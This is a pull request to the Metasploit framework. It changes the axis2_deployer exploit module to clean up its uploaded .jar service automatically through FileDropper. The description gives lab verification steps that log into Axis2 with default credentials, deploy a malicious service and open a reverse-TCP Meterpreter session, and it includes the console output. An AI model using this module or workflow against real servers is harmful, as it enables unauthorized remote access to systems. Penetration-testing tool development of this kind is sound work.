### PR TITLE
Fix #6268, Use FileDropper for axis2_deployer

### DIFF
--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -75,6 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def upload_exec(session,rpath)
     contents=''
     name = Rex::Text.rand_text_alpha(8)
+
+    # We must register this file early, that way the on_new_session method
+    # won't miss it if FileDropper's cleanup routine kicks in.
+    register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
+
     services_xml = %Q{
 <service name="#{name}" scope="application">
   <description>
@@ -216,7 +221,6 @@ class Metasploit3 < Msf::Exploit::Remote
           end
 
           if res and res.code > 200 and res.code < 300
-            register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
             throw :stop # exit loop
           elsif res and res.code == 401
             if (res.headers['WWW-Authenticate'])
@@ -226,7 +230,6 @@ class Metasploit3 < Msf::Exploit::Remote
             if authmsg
               print_error("WWW-Authenticate: %s" % authmsg)
             end
-            register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
             raise ::Rex::ConnectionError
             throw :stop # exit loop
           end

--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -215,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote
           end
 
           if res and res.code > 200 and res.code < 300
-            cleanup_instructions(rpath, name) # display cleanup info
+            register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
             throw :stop # exit loop
           elsif res and res.code == 401
             if (res.headers['WWW-Authenticate'])
@@ -225,7 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
             if authmsg
               print_error("WWW-Authenticate: %s" % authmsg)
             end
-            cleanup_instructions(rpath, name) # display cleanup info
+            register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
             raise ::Rex::ConnectionError
             throw :stop # exit loop
           end
@@ -234,19 +235,6 @@ class Metasploit3 < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError
       print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})")
     end
-  end
-
-  def cleanup_instructions(rpath, name)
-    print_line("")
-    print_status("NOTE: You will need to delete the web service that was uploaded.")
-    print_line("")
-    print_status("Using meterpreter:")
-    print_status("rm \"webapps#{rpath}/WEB-INF/services/#{name}.jar\"")
-    print_line("")
-    print_status("Using the shell:")
-    print_status("cd  \"webapps#{rpath}/WEB-INF/services\"")
-    print_status("del #{name}.jar")
-    print_line("")
   end
 
   def exploit


### PR DESCRIPTION
Fix #6268 

To verify:
- [x] Start a Windows box, such as Windows Server 2003
- [x] Download and install: http://mirrors.ibiblio.org/apache/tomcat/tomcat-6/v6.0.44/bin/apache-tomcat-6.0.44.exe
- [x] Download and deploy http://archive.apache.org/dist/axis/axis2/java/core/1.6.0/axis2-1.6.0-war.zip
- [x] Start msfconsole
- [x] `use exploit/multi/http/axis2_deployer`
- [x] `set rhost [IP]`
- [x] `set payload java/meterpreter/reverse_tcp`
- [x] `set lhost [IP]`
- [x] `run`
- [x] You should see something like this:

```
msf exploit(axis2_deployer) > run

[*] Started reverse TCP handler on 192.168.1.199:4444 
[+] http://192.168.1.109:8080/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'
[*] Successfully uploaded
[*] Polling to see if the service is ready
[*] Sending stage (45741 bytes) to 192.168.1.109
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.109:2497) at 2016-01-12 15:21:59 -0600
[+] Deleted webapps/axis2/WEB-INF/services/oYbElqbC.jar

meterpreter > 
```
